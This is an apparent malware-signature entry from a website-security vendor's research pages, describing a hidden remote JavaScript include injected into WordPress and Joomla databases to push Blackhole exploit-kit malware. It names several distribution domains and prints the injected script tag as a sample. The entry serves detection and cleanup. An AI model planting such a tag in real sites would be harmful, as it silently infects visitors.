malware-entry-mwiframehd2298

Description:

A remote javascript file was found inside the site content (possibly injected in the database). It is used to distribute malware from external web sites while not being visible to the user (also known as HTTP Malicious Toolkit and Blackhole exploit- depending on the intermediary domains).

Domains used in this attack:


http://injj.ignorelist.com/14

http://innn.ignorelist.com/in.php?n=14

http://www3.bestoyumaster.rr.nu/?h0..

(and many others)

Affecting:

WordPress and Joomla sites.

Clean up:

This malware is generally hidden inside the database (wp-content table). Sign up here to get it clean up: Signup

Malware dump (sample of malware):

<br /> <script src="http://injj.ignorelist.com/14"></script><br /> </code></p> </div> <footer class="entry-footer wedocs-entry-footer"> <div class="wedocs-article-author" itemprop="author" itemscope itemtype="https://schema.org/Person"> <meta itemprop="name" content="Rodrigo Escobar" /> <meta itemprop="url" content="https://labs.sucuri.net/author/rodrigo-escobar/" /> </div> <meta itemprop="datePublished" content="2019-05-16T00:00:00+00:00"/> <time itemprop="dateModified" datetime=""></time> </footer> <nav class="wedocs-doc-nav wedocs-hide-print"><h3 class="assistive-text screen-reader-text">Doc navigation</h3><span class="nav-prev"><a href="https://labs.sucuri.net/signatures/sitecheck/malware-entry-mwiframehd22/">← malware-entry-mwiframehd22</a></span><span class="nav-next"><a href="https://labs.sucuri.net/signatures/sitecheck/malware-entry-mwiframehd3/">malware-entry-mwiframehd3 →</a></span></nav> </article> </div> </div> </main></div> </div> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div>  </div> </footer> </div> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/anchor.min.js?ver=1.6.2' id='wedocs-anchorjs-js'></script> <script type='text/javascript' id='wedocs-scripts-js-extra'> /* <![CDATA[ */ var weDocs_Vars = {"ajaxurl":"https:\/\/labs.sucuri.net\/wp-admin\/admin-ajax.php","nonce":"f7daccb26c","style":"https:\/\/labs.sucuri.net\/wp-content\/plugins\/wedocs\/assets\/css\/print.css","powered":"\u00a9 Sucuri Labs, 2024. Powered by weDocs<br>https:\/\/labs.sucuri.net"}; /* ]]> */ </script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/frontend.js?ver=1701723111' id='wedocs-scripts-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215' id='sucurikb-navigation-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215' id='sucurikb-skip-link-focus-fix-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1' id='foundation-js-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1' id='sucuri-wp-custom-js-js'></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>

SiteCheck Signatures